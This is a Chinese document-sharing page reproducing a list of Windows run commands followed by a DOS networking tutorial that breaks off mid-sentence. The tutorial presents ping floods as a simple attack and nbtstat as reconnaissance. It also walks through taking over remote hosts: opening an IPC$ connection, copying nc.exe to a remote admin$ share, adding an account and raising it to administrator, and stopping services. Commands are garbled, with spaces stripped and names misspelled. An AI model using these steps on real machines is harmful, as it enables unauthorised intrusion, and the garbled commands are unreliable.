win7命令大全DOS命令大全docx.docx

win7命令大全DOS命令大全docx.docx

《win7命令大全DOS命令大全docx.docx》由会员分享，可在线阅读，更多相关《win7命令大全DOS命令大全docx.docx（9页珍藏版）》请在冰豆网上搜索。

win7命令大全DOS命令大全docx

WIN7命令

winver检查Windows版本

wmimgmt.msc----打开windows管理体系结构（WMI）

wupdmgrwindows更新程序

wscriptwindows脚本宿主设置

write写字板

winmsd系统信息

wiaacmgr扫描仪和照相机向导

winchatXP自带局域网聊天

mem.exe显示内存使用情况

Msconfig.exe---系统配置实用程序

mplayer2简易widnowsmediaplayer

mspaint画图板

mstsc远程桌面连接

mplayer2媒体播放机

magnify放大镜实用程序

mmc打开控制台

mobsync同步命令

dxdiag检查DirectX信息

drwtsn32系统医生

dfrg.msc磁盘碎片整理程序

diskmgmt.msc---磁盘管理实用程序dcomcnfg打开系统组件服务

ddeshare打开DDE共享设置

dvdplayDVD播放器

netstopmessenger——停止信使服务

netstartmessenger----开始信使服务

notepad打开记事本

nslookup网络管理的工具向导

ntbackup系统备份和还原

narrator屏幕“讲述人”

ntmsmgr.msc----移动存储管理器

ntmsoprq.msc---移动存储管理员操作请求

netstat-an----（TC）命令检查接口

syncapp仓H建一个公文包

sysedit系统配置编辑器

sigverif-------文件签名验证程序

sndrec32录音机

shrpubw创建共享文件夹

secpol.msc——本地安全策略

系统的双重密码

syskey系统加密，一旦加密就不能解开，保护windowsxp

services.msc---本地服务设置

Sndvol32音量控制程序

sfc.exe系统文件检查器

sfc/scannow---windows文件保护

tsshutdn60秒倒计时关机命令

tourstartxp简介（安装完成后出现的漫游xp程序）

taskmgr-任务管理器

eventvwr事件查看器

eudcedit造字程序

explorer打开资源管理器

packager对象包装程序

perfmon.msc----计算机性能监测程序

progman程序管理器

regedit.exe----注册表

rsop.msc组策略结果集

regedt32——注册表编辑器

rononce-p----15秒关机

regsvr32/u*.dll----停止dll文件运行

命令提示符

regsvr32/uzipfldr.dll取消ZIP支持cmd.exeCMD

chkdsk.exe——Chkdsk磁盘检查

certmgr.msc----证书管理实用程序

calc启动计算器

charmap启动字符映射表

cliconfgSQLSERVER客户端网络实用程序

Clipbrd剪贴板查看器

conf-启动netmeeting

compmgmt.msc---计算机管理

cleanmgrAA整理

ciadv.msc索引服务程序

osk打开屏幕键盘

odbcad32ODBC数据源管理器

oobe/msoobe/a----检查XP是否激活

lusrmgr.msc----本机用户和组

logoff-

注销命令

iexpress

木马捆绑工具，系统自带

Nslookup

地址侦测器

fsmgmt.msc

共享文件夹管理器

utilman

辅助工具管理器

DOS命令

一，ping

它是用来检查网络是否通畅或者网络连接速度的命令。

作为一个生活在网络上的管理

员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：

网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回

一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目

标主机的操作系统等。

下面就来看看它的一些常用的操作。

先看看帮助吧，在DOS窗口中

键入：

ping/?

回车，。

所示的帮助画面。

在此，我们只掌握一些基本的很有用的参数就可以了（下同）。

-t表示将不间断向目标IP发送数据包，直到我们强迫其停止。

试想，如果你使用

100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了

这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。

-I定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。

结合上面介绍的-t参数一起使用，会有更好的效果哦。

-n定义向目标IP发送数据包的次数，默认为3次。

如果网络速度比较慢，3次对我

们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义

为一次吧。

说明一下，如果-t参数和-n参数一起使用，ping命令就以放在后面的参数为标准,比如“pingIP-t-n3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping3

次。

另外，ping命令不一定非得pingIP，也可以直接ping主机域名，这样就可以得到主机的IP。

下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以

判断网络连接速度的大小。

从TTL的返回值可以初步判断被ping主机的操作系统，之所

以说“初步判断”是因为这个值是可以修改的。

这里TTL=32表示操作系统可能是win98。

（小知识：

如果TTL=128，则表示目标主机可能是Win2000;如果TTL=250，则

目标主机可能是Unix）

至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可

以对别人进行ping攻击……这些就*大家自己发挥了。

二，nbtstat

该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。

在此我们就有必要了解几个基本的参数。

-a使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS

信息（下同）。

-A这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。

-n列出本地机器的NETBIOS信息。

当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。

三，netstat

这是一个用来查看网络状态的命令，操作简便功能强大。

-a查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服

务等信息，如图4。

这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。

用

法：

netstat-aIP。

-r列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。

用法：

netstat

-rIP。

四，tracert

跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途

径，这对我们了解网络布局和结构很有帮助。

如图5。

这里说明数据从本地机器传输到192.168.0.1的机器上，中间没有经过任何中转，说

明这两台机器是在同一段局域网内。

用法：

tracertIP。

五，net

这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为

它的功能实在是太强大了，这简直就是微软为我们提供的最好的入侵工具。

首先让我们来看

一看它都有那些子命令，键入net/?

回车如图6。

在这里，我们重点掌握几个入侵常用的子命令。

netview

使用此命令查看远程主机的所以共享资源。

命令格式为netview\IP。

netuse

把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。

命令格式为

netusex:

\IPsharename。

上面一个表示把192.168.0.5IP的共享名为magic的目录影

射为本地的Z盘。

下面表示和192.168.0.7建立IPC$连接（netuse\IPIPC$"password"/user:

"name"），

建立了IPC$连接后，呵呵，就可以上传文件了：

copync.exe\192.168.0.7admin$

表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他DOS命令就可以实

现入侵了。

netstart

使用它来启动远程主机上的服务。

当你和远程主机建立连接后，如果发现它的什么服

务没有启动，而你又想利用此服务怎么办？

就使用这个命令来启动吧。

用法：

netstart

servername，如图9，成功启动了telnet服务。

netstop

入侵后发现远程主机的某个服务碍手碍脚，怎么办？

利用这个命令停掉就ok了，用

法和netstart同。

netuser

查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户

禁用等。

这对我们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。

键入不带参数的netuser，可以查看所有用户，包括已经禁用的。

下面分别讲解。

1,netuserabed1234/add

，新建一个用户名为abed，密码为1234的帐户，默

认为user组成员。

2,netuserabed/del，将用户名为abed的用户删除。

3，netuserabed/active:

no，将用户名为abed的用户禁用。

4，netuserabed/active:

yes，激活用户名为abed的用户。

5，netuserabed，查看用户名为abed的用户的情况

netloealgroup

查看所有和用户组有关的信息和进行相关操作。

键入不带参数的netloealgroup即

列出当前所有的用户组。

在入侵过程中，我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐户就可以控制整个远程主机了。

用法：

net

loealgroupgroupnameusername/add。

现在我们把刚才新建的用户abed加到administrator组里去了，这时候abed用户

已经是超级管理员了，呵呵，你可以再使用netuserabed来查看他的状态。

nettime

这个命令可以查看远程主机当前的时间。

如果你的目标只是进入到远程主机里面，那么也许就用不到这个命令了。

但简单的入侵成功了，难道只是看看吗？

我们需要进一步渗透。

这就连远程主机当前的时间都需要知道，因为利用时间和其他手段（后面会讲到）可以实现

某个命令和程序的定时启动，为我们进一步入侵打好基础。

用法：

nettime\IP。

六，at

（知道nettime

这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序的重要了吧？

）。

当我们知道了远程主机的当前时间，就可以利用此命令让其